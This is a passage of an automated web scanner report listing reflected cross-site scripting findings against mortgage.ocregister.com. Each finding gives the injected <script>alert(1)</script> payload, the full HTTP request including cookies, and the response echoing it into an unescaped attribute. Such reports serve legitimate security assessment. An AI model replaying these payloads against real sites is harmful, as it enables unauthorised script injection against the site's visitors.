X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11b3cd6\"><script>alert(1)</script>c5248f34aad/feed/" />
...[SNIP]...

1.278. http://mortgage.ocregister.com/2008/11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bc7"><script>alert(1)</script>a0f4b09cc80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bc7\"><script>alert(1)</script>a0f4b09cc80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/11/?59bc7"><script>alert(1)</script>a0f4b09cc80=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11/?59bc7\"><script>alert(1)</script>a0f4b09cc80=1feed/" />
...[SNIP]...

1.279. http://mortgage.ocregister.com/2008/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb99f"><script>alert(1)</script>73505128c2a was submitted in the REST URL parameter 1. This input was echoed as fb99f\"><script>alert(1)</script>73505128c2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008fb99f"><script>alert(1)</script>73505128c2a/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008fb99f\"><script>alert(1)</script>73505128c2a/12/feed/" />
...[SNIP]...

1.280. http://mortgage.ocregister.com/2008/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f6bd"><script>alert(1)</script>e08417cca0d was submitted in the REST URL parameter 2. This input was echoed as 9f6bd\"><script>alert(1)</script>e08417cca0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/129f6bd"><script>alert(1)</script>e08417cca0d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/129f6bd\"><script>alert(1)</script>e08417cca0d/feed/" />
...[SNIP]...

1.281. http://mortgage.ocregister.com/2008/12/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581fa"><script>alert(1)</script>91923fa8a10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 581fa\"><script>alert(1)</script>91923fa8a10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/12/?581fa"><script>alert(1)</script>91923fa8a10=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/12/?581fa\"><script>alert(1)</script>91923fa8a10=1feed/" />
...[SNIP]...

1.282. http://mortgage.ocregister.com/2009/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d904e"><script>alert(1)</script>ffe0d03125f was submitted in the REST URL parameter 1. This input was echoed as d904e\"><script>alert(1)</script>ffe0d03125f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009d904e"><script>alert(1)</script>ffe0d03125f/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009d904e\"><script>alert(1)</script>ffe0d03125f/01/feed/" />
...[SNIP]...

1.283. http://mortgage.ocregister.com/2009/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17425"><script>alert(1)</script>04dd09f1aff was submitted in the REST URL parameter 2. This input was echoed as 17425\"><script>alert(1)</script>04dd09f1aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0117425"><script>alert(1)</script>04dd09f1aff/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0117425\"><script>alert(1)</script>04dd09f1aff/feed/" />
...[SNIP]...

1.284. http://mortgage.ocregister.com/2009/01/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfd6"><script>alert(1)</script>57a08275a9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dfd6\"><script>alert(1)</script>57a08275a9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/01/?7dfd6"><script>alert(1)</script>57a08275a9d=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/01/?7dfd6\"><script>alert(1)</script>57a08275a9d=1feed/" />
...[SNIP]...

1.285. http://mortgage.ocregister.com/2009/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae10"><script>alert(1)</script>bd79c7c5eb was submitted in the REST URL parameter 1. This input was echoed as aae10\"><script>alert(1)</script>bd79c7c5eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009aae10"><script>alert(1)</script>bd79c7c5eb/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009aae10\"><script>alert(1)</script>bd79c7c5eb/02/feed/" />
...[SNIP]...

1.286. http://mortgage.ocregister.com/2009/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14452"><script>alert(1)</script>9b71eedb14c was submitted in the REST URL parameter 2. This input was echoed as 14452\"><script>alert(1)</script>9b71eedb14c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0214452"><script>alert(1)</script>9b71eedb14c/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0214452\"><script>alert(1)</script>9b71eedb14c/feed/" />
...[SNIP]...

1.287. http://mortgage.ocregister.com/2009/02/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46c5"><script>alert(1)</script>3744f3c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46c5\"><script>alert(1)</script>3744f3c36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/02/?a46c5"><script>alert(1)</script>3744f3c36=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/02/?a46c5\"><script>alert(1)</script>3744f3c36=1feed/" />
...[SNIP]...

1.288. http://mortgage.ocregister.com/2009/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b293"><script>alert(1)</script>6ae8dc92a5 was submitted in the REST URL parameter 1. This input was echoed as 6b293\"><script>alert(1)</script>6ae8dc92a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20096b293"><script>alert(1)</script>6ae8dc92a5/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20096b293\"><script>alert(1)</script>6ae8dc92a5/03/feed/" />
...[SNIP]...

1.289. http://mortgage.ocregister.com/2009/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa27"><script>alert(1)</script>d1503a6c825 was submitted in the REST URL parameter 2. This input was echoed as caa27\"><script>alert(1)</script>d1503a6c825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/03caa27"><script>alert(1)</script>d1503a6c825/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03caa27\"><script>alert(1)</script>d1503a6c825/feed/" />
...[SNIP]...

1.290. http://mortgage.ocregister.com/2009/03/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c6"><script>alert(1)</script>7284a87d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 572c6\"><script>alert(1)</script>7284a87d77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/03/?572c6"><script>alert(1)</script>7284a87d77=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/03/?572c6\"><script>alert(1)</script>7284a87d77=1feed/" />
...[SNIP]...

1.291. http://mortgage.ocregister.com/2009/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f1d"><script>alert(1)</script>e69b8dc3898 was submitted in the REST URL parameter 1. This input was echoed as e5f1d\"><script>alert(1)</script>e69b8dc3898 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009e5f1d"><script>alert(1)</script>e69b8dc3898/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

